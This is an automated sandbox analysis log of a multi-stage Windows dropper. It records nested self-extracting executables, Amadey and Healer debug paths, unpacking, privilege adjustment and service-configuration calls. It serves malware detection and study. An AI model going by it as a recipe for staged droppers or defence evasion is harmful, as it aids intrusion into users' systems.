                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_010B1F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00961F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00961F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00191F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00191F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: String function: 02BFE43F appears 44 times
                      Source: kino0095.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 712052 bytes, 2 files, at 0x2c +A "kino2456.exe" +A "en675431.exe", ID 1903, number 1, 28 datablocks, 0x1503 compression
                      Source: kino2456.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 566384 bytes, 2 files, at 0x2c +A "kino0588.exe" +A "dvL76s65.exe", ID 2007, number 1, 24 datablocks, 0x1503 compression
                      Source: kino0588.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 206926 bytes, 2 files, at 0x2c +A "bus9402.exe" +A "con1332.exe", ID 1794, number 1, 11 datablocks, 0x1503 compression
                      Source: szDGo5lHdI.exeBinary or memory string: OriginalFilename vs szDGo5lHdI.exe
                      Source: szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs szDGo5lHdI.exe
                      Source: szDGo5lHdI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: dvL76s65.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: con1332.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: szDGo5lHdI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus9402.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/11@0/1
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_0040597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0040597D
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeCode function: 4_2_00007FFBACED1B10 ChangeServiceConfigA,4_2_00007FFBACED1B10
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00404FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00404FE0
                      Source: szDGo5lHdI.exeReversingLabs: Detection: 46%
                      Source: szDGo5lHdI.exeVirustotal: Detection: 44%
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\szDGo5lHdI.exe C:\Users\user\Desktop\szDGo5lHdI.exe
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00401F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_010B1F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00961F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00961F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00191F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00191F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_0040597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0040597D
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_069027C6 CreateToolhelp32Snapshot,Module32First,0_2_069027C6
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCommand line argument: Kernel32.dll0_2_00402BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCommand line argument: Kernel32.dll1_2_010B2BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCommand line argument: Kernel32.dll2_2_00962BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCommand line argument: Kernel32.dll3_2_00192BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCommand line argument: 08A13_2_00413780
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeAutomated click: OK
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeAutomated click: OK
                      Source: szDGo5lHdI.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: szDGo5lHdI.exeStatic file information: File size 1228288 > 1048576
                      Source: szDGo5lHdI.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x106a00
                      Source: szDGo5lHdI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: szDGo5lHdI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: szDGo5lHdI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: szDGo5lHdI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: szDGo5lHdI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: szDGo5lHdI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: szDGo5lHdI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wextract.pdb source: szDGo5lHdI.exe, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: szDGo5lHdI.exe, 00000000.00000003.260924559.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, ge821663.exe.0.dr
                      Source: Binary string: Healer.pdb source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wextract.pdbGCTL source: szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, bus9402.exe, 00000004.00000000.264403832.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, bus9402.exe.3.dr
                      Source: Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000000.300762945.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1332.exe.3.dr
                      Source: Binary string: _.pdb source: con1332.exe, 0000000D.00000002.328304640.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000003.304290466.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, dvL76s65.exe, 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\sigizecem\xigago\tukonunoz_givizadi\yodawusafix\11\j.pdb source: szDGo5lHdI.exe
                      Source: Binary string: Healer.pdbH5 source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeUnpacked PE file: 0.2.szDGo5lHdI.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeUnpacked PE file: 13.2.con1332.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeUnpacked PE file: 15.2.dvL76s65.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeUnpacked PE file: 0.2.szDGo5lHdI.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.data:W;.idata:R;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeUnpacked PE file: 13.2.con1332.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeUnpacked PE file: 15.2.dvL76s65.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_0040724D push ecx; ret 0_2_00407260
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_06903E94 pushad ; retf 0_2_06903E95
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_069058D3 push cs; ret 0_2_069058D4
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_06903F0B push FFFFFF8Bh; ret 0_2_06903F0D
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_06907623 pushfd ; ret 0_2_06907624
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B724D push ecx; ret 1_2_010B7260
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_0096724D push ecx; ret 2_2_00967260
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_0019724D push ecx; ret 3_2_00197260
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0041C40C push cs; iretd 13_2_0041C4E2
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00423149 push eax; ret 13_2_00423179
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0041C50E push cs; iretd 13_2_0041C4E2
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_004231C8 push eax; ret 13_2_00423179
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0040E21D push ecx; ret 13_2_0040E230
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0041C6BE push ebx; ret 13_2_0041C6BF
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C0C125 push ebx; ret 13_2_02C0C126
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C0BE73 push cs; iretd 13_2_02C0BF49
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C0BF75 push cs; iretd 13_2_02C0BF49
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BFE484 push ecx; ret 13_2_02BFE497
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_046B454E push ecx; retf 13_2_046B4554
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_046B4139 push edi; iretd 13_2_046B414E
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00402F1D
                      Source: en675431.exe.1.drStatic PE information: 0xEFAF45DE [Wed Jun 5 03:28:30 2097 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.985286241021559
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.842085736950787
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.7554731967823
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeJump to dropped file
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeJump to dropped file
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeJump to dropped file
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00401AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00401AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_010B1AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00961AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00961AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00191AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_00191AE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
